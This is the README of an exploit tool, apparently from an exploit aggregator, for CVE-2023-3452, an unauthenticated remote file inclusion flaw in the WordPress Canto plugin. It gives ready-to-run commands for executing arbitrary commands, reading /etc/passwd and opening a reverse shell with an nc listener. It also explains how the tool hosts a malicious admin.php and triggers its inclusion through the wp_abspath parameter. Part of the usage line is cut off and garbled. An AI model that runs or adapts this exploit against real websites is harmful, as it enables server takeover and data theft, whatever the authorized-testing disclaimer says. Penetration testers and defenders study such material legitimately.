Share
## https://sploitus.com/exploit?id=A02E0041-D609-5695-B314-D21B78161F8A
# CVE-2023-3452 - WordPress Canto Plugin RCE

Exploit for the WordPress Canto Plugin (≀ 3.0.4) RFI vuln. **Actually works on HTTPS** β€” the other public PoCs kinda gave up on SSL.

*Credit where it's due: this CVE was found by others. I just made a version that doesn't break on HTTPS targets.*

## Vulnerability

| | |
|---|---|
| **CVE** | CVE-2023-3452 |
| **EDB-ID** | [51826](https://www.exploit-db.com/exploits/51826) |
| **Type** | Remote File Inclusion (RFI) β†’ Unauthenticated RCE |
| **Affected** | WordPress Canto Plugin  -l  -p  [OPTIONS]
```

### Arguments

| Option | Description | Required |
|--------|-------------|----------|
| `-t`, `--target` | Target WordPress URL (HTTP or HTTPS) | Yes |
| `-l`, `--lhost` | Your IP β€” target needs to reach this for the payload | Yes |
| `-p`, `--lport` | Payload server port (default: 8888) | No |
| `-c`, `--command` | Command to run on target | No* |
| `--revshell` | Spawn reverse shell | No |
| `--shell-port` | Listener port for rev shell (default: 4444) | No |
| `-i`, `--interactive` | Interactive shell mode | No |
| `-v`, `--verbose` | Extra output | No |
| `--skip-check` | Skip the vuln check | No |

\* No command = runs `id; whoami; hostname` as a sanity check

### Examples

**Single command:**
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"
```

**Read a file:**
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"
```

**Reverse shell** (run `nc -lvnp 4444` first):
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444
```

**Interactive mode:**
```bash
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i
```

**HTTPS CTF target:**
```bash
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"
```

## How It Works

1. **Check** β€” Hits `/wp-content/plugins/canto/readme.txt`, parses version (≀ 3.0.4 = vulnerable)
2. **Payload** β€” Writes a fake `wp-admin/admin.php` that runs your command via `system()`
3. **Serve** β€” Spins up a local HTTP server so the target can fetch our file
4. **Trigger** β€” Requests `download.php` with `wp_abspath=http://LHOST:LPORT` so it includes our remote PHP
5. **Execute** β€” Their server runs our code, we get the output back

## Network Notes

- Target must be able to reach your machine on `LHOST:LPORT` (for HTB/labs, that’s your VPN IP)
- Firewall needs to allow inbound on the payload port (`-p`)

## Disclaimer

Authorized testing and education only. Only touch systems you’re allowed to. Anything else is illegal.

## License

MIT